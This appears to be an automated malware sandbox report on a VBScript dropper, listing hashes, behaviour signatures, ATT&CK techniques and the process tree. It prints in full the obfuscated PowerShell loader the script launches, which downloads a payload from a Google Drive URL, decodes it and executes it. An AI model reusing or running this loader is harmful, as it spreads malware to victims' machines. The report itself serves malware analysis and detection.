c35bfeb23cb378e33d9c0f953db2c23f03575a70b5157e428621e5a71456040f

General

Target

27b8abaa4457130d3435ae7db4ae8049c48c50a700a535029ce1f8c621877579.vbs
Size

210KB
MD5

4a6be1b6607a80a583ff05c2ed8908ef
SHA1

5073ceb6220c10c872b58d433c0d46994353af4e
SHA256

27b8abaa4457130d3435ae7db4ae8049c48c50a700a535029ce1f8c621877579
SHA512

25a9df574bf012aa79f9787736ed65eb3cfc3976e5a18137611615a7a99fb2a0614f98086260e85b880d932b46ffea1bc905a8d2cc2fac049eafb4040d8f817f
SSDEEP

6144:lYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJf6q6I:e2dOUB6

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2108	WScript.exe
11	4788	powershell.exe
17	4788	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	drive.google.com
11	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4788	powershell.exe
4788	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4788	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 4788	2108	WScript.exe	87
PID 2108 wrote to memory of 4788	2108	WScript.exe	87
PID 4788 wrote to memory of 3372	4788	powershell.exe	91
PID 4788 wrote to memory of 3372	4788	powershell.exe	91

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27b8abaa4457130d3435ae7db4ae8049c48c50a700a535029ce1f8c621877579.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kindbakke = 1;$Unwebbed='Substrin';$Unwebbed+='g';Function Snese($Heraldically63){$Skdskindets=$Heraldically63.Length-$Kindbakke;For($Smand=5; $Smand -lt $Skdskindets; $Smand+=(6)){$Septangled+=$Heraldically63.$Unwebbed.Invoke($Smand, $Kindbakke);}$Septangled;}function Begreberne($Mellemdistancevaabnene){. ($Heterochromosome) ($Mellemdistancevaabnene);}$Bonteboks=Snese 'SamleMKnojeo Outsz .kbniHjfrelTa.stlBlemoaUhums/Tol g5 Kla,.Brink0Inter Hears( enatW.odstiDiglonBevg,dme ico Ret w farvsPosix Tale NIstniT vers Pa do1 Aroi0Squim.Count0Jn,tb;Lappe VuggeW.eforiEmmysnHippi6D.vot4tre,a;.tati Scorpx Lgeh6D.skb4.nnov;sluta fotoarGenevvOphre:Brovt1So,en2Despo1Artik.Strgk0Fortl)unp,o uprisGTred.eSprigcEye.akStedso Appe/unl.w2Iri i0M.dic1 p.ys0 s,ri0 ,aml1Alkoh0 Tewe1Asmal ReissF,olkli envir UndeeTrithfLea,eo StroxPlica/ form1Bolds2 ,omi1Oxymo.Futur0Almin ';$diarrheal=Snese 'BlokkUFinhesUlmede ErasrMalp,-KnudiADcapog Rub.eModhanBynavtNaive ';$Independentism=Snese 'SoundhLo.est ,asitPolyspIngens,arss:Stedb/Ped i/TrilodGrandrForlfi.tromvvi,eoeSkoli. En,rgArthro Spr,o ForegAmli lPsy heRekin.Paysac Trado SprimSelvb/UbehauBevidc Bitt?CuddleCoalixKunorpFr.heoPalaerAl umtUnder=ShelldBabasoDec,mwStemnnTiletlRebsloFili aPapi.dSwidd& ,pheiB.spedC.toq= Form1KalaswTargeJAcor.iFlok uSheoaGCrammbCosie3Svrddr A roTLuksuFChar.Mpain,vLactej,elepLFrytlZTeleg3WolfldMorroPSn rr0Andr.ELegevkEpiglmMinutO Xerf2Pronec ark,xAfspn5Dagobkwinds8Begra6 Skov_.steoeUnder ';$Ndtrftigst=Snese 'Dknin>.ramm ';$Heterochromosome=Snese 'Arbeji DemoeSmokoxMaron ';$Forlsendes = Snese 'Breadea.tiscIndkrhAbo noG nne Sp.yn% H,nparelsep eetp tuddSli eaProtet supeaOktav%Bered\kadavTLidk.iInkasl OptokGif bmForpupDdnine FisslcontasMedene Akse. IdioOBevidwCon ee rois Lautu& Atri&under Ex.eeMods.cDis,rh CopooEdwar Stamk$Pre n ';Begreberne (Snese 'Depen$EmbreghuxlelFelt.oForbeb App aSoloslUtsme: AppeK amilaInstrtFiskehCocktrSfartiCeratnDiase=Perin(MandacMaplemIsl.dd Eksp Prodr/punticArea, Repos$GutsiFBindeoPourpr DagslKom.isK.ntoeUnismnInitidUregee Appesgn,vp)Skriv ');Begreberne (Snese 'R yth$DehydgGaleelMorbioRa.dmbsuperaSpon lBilla:Carb,BResknuSwal.lkntr.l MavohForudePo,tuaRegisd Ops,eForfedObstilCoconyRa,fi= Cl,n$,eturIVacuonKultudStileetabt,p Barge PlasnAntipdDigteeGod enK,lontKn thiYeellsUnbrum Raak.schops uganpLedigl KonkiPlougtMi ro(Sulte$uns.rN DiaddvicentFi kerMarcof,rthot.umeriV dergdramasS.ednt Cafe)Ls gl ');$Independentism=$Bullheadedly[0];Begreberne (Snese 'Scull$ gunygBan.vlStokkoin,erb JernaB,ickl Offe: A.efW Un,ne Opism Mor,=IdsnoNUninfeForrawhobbe-Lys pOKamm.bG,ngejAmp,ueAlgolcS udstperis BkkenStarnayRetsfsNikketSociaeMetalm k,ek.IndivNLanaaeIkendtMonog.UnderWI.tsteWycl.bJapo CKl.nil Bredi,iniseGaastnDyrebt.tere ');Begreberne (Snese 'F.laf$W,anoW OvereHyothmKry.t.AudioHInddkeMercaaAntird.eappeSpirerDekadsfootp[Impro$F rtod KulmiPecula Ash r LsperGoldihOutcaeSwif aCertil Tran]Litte=Gode,$IsoleBDiadro.geblnDiamat udlne Offub GlasoSelvokAnisosTyvet ');$ky=Snese 'GaareW Filme Fej.m A,fl.uprooDW,wrgo SurmwP,aklnTryk.lCrossoMul saFi kedKaffeFSadlei GuanlSpi.deangak(Nondi$t,ranITest nBun.fd LysreProkupArsineChen.nKommodastroeTilstn CoattPropei Kvals,lytrmch.vi,H.rmo$ AfgiF Di soTwinkrdukkhs HenstRehasebagaunBifloi AlfrnminuegHorissspeci)Opdrt ';$ky=$Kathrin[1]+$ky;$Forstenings=$Kathrin[0];Begreberne (Snese 'Bone $KlistgSofislSk oto DjvebI eala Me,ulFilia:IsuroRGro.eeTeltpm SandoPangun Armet Modse ThairAyuyuiRepasn UmorgA xofeOverfnFlocc=Endep(E,herTDejageP,rtisDiscrtBaret- BundP F teaBaciltOverrhIk na Kurve$DiverFRveskoPartirAkro.s Endet BevgeAkromn PostiPaa,rn RifagLa dssUopla) Urte ');while (!$Remonteringen) {Begreberne (Snese ' Sept$RedregFraa.l Re,roT,mpebeksamaKna,llDe.at: Sel,MLeigeoWalenrEpinamYsetto Ye,lrTupelaMand n MantdS,mmeoxiph.= Bise$StukktSterlrUnsatuBucepe Fdeg ') ;Begreberne $ky;Begreberne (Snese ' RenoSShee tpleuraGondorTandbt.rang-Ver.iSBrickl TekneLovore Antip Muco Arabi4Caduc ');Begreberne (Snese ' udai$Hona.gDesenlC,assoBroccb Optaa ilkelPal,i:MetamRStaaleCodesmSonedoImmo,nCluritagerseculmirA,etoiJernanD cyegEvente Byk nJurat=Kvlde(LunatTRancheScenesSammetChast-HeminPHypnaaSideht UnclhOverf Milie$KodniFSydfoo CorsrEngres Lea tAnstte ,nfunAquadi PargnUnabjgIncorsStign)M,sin ') ;Begreberne (Snese 'K mpa$RelivgVineyl PostoAdoptb InhaaUnshrl Grns:Sp,llROut.ie sig.cUns olrekyli lantnFirebeSpillsMoha.=Dysur$CoracgB.ttelHelsioHensybRhabaahrvrkl Bort:OutwoKSprayueccenr prossDa oieProcerherponHulebeParad1,repa8Musik8St rg+Detac+.rbej%.pmun$DebatB K louPhaeolUbehalStudihRandpe.ennia P.nedSlj,reV jfodRou,elunsavyProcl.An.iccad poo U biu ummndesoxt,isso ') ;$Independentism=$Bullheadedly[$Reclines];}Begreberne (Snese 'extol$Res fg Eu.hl brttoStrygbflegma TemplIntr,:AssoccChanciEva.gsHookutGar ev S edaperhye G rtnSa,ge Be a= Usal HedebGEx,iseUnhedtR wbo- ErhvCD.geroPrisenhousetBird.eUns.pn RekutTakke ldst$SprlsFAni.ao Bea.r X.losHaardtmalereSem vnPresbiBucchnKissyg SundsMenda ');Begreberne (Snese 'Afbre$TugtegVendelUnchao Eks b Tesaa UopslFes o:U,driSFangstDiurniMenuakPreexlArbe.aPreeng ImpenImposeOphiorHa,ainAutoce,ynli N lko=re is Disko[mudpaSOxyntyIranis Kvs.t lphaeEmendmBagat. Ti fCNumisoKlovnn V.luvChowee lerkrOvul,tIn,ia]Ateli: Nirl:ProduFSpecirDisproTekstmCircuB Eva adrjhesbevgee Radi6Radio4AgoraSSvecit BeserImproiTomiun.agsigThron(Inge.$Kam.kc,npreiGa,nisSygdotTa pov Afsga AlareDan.ynSal,s)Misdi ');Begreberne (Snese 'saddu$ Kam.gFunctlCountoAssimbVa,lea Ordkl Bour:veranO ObjedFlyveoO.erfnBrletthaandelinjexUdforeGald sForskiBeaugsSu,ti Mon t=bivir Vi,ti[CooniSChrisyFortnsUtilitTid.feSkuddmC ntr.BlockTF,dboefanatxAp.titDomes.O,rusE WyannTotalcBolsjoAnmrkdfrgeliBesudnToolmgVddel]Uddat:preaf:Ba daATamonSg,dsfCb mbyIEnro.I Vide.OpstiGboeg,e ForutGuld,SActint,fbinrCo.muiBar en onisgtrans(Na re$CelatSSamlet h ndiFrdigkBy,gelCarumaSpinsgFladlnCrespepalisrSk ann ,urdeUddis)Robep ');Begreberne (Snese 'manif$.artig Ma,hlNonmeoCaptibSly,gaFl.cclMiner:VasstH ZincuScytomAnticmUnstueMegaltUncom= Ca d$EpibaOAcierdB,rdeoOblatnSorbotExcomeni,raxObjeceTrolds Mi,diIridostrkga.PallisbenziuNeuryb .ommsToyfut Antir almai Us enMaanegSerab(L ndb3Indla2Photo4Veder1Cepha4Tiles2udenr, Konf2Pound9Oegep2Hunde9 nder4Unmis) Gyro ');Begreberne $Hummet;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tilkmpelse.Owe && echo $"
    3⤵
    PID:3372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kwkoacvi.ct5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4788-2-0x0000010C4B800000-0x0000010C4B822000-memory.dmp

Filesize
136KB

Download
memory/4788-12-0x00007FFC72C90000-0x00007FFC73751000-memory.dmp

Filesize
10.8MB

Download
memory/4788-13-0x0000010C49680000-0x0000010C49690000-memory.dmp

Filesize
64KB

Download
memory/4788-14-0x0000010C49680000-0x0000010C49690000-memory.dmp

Filesize
64KB

Download
memory/4788-17-0x0000010C49680000-0x0000010C49690000-memory.dmp

Filesize
64KB

Download
memory/4788-20-0x00007FFC72C90000-0x00007FFC73751000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing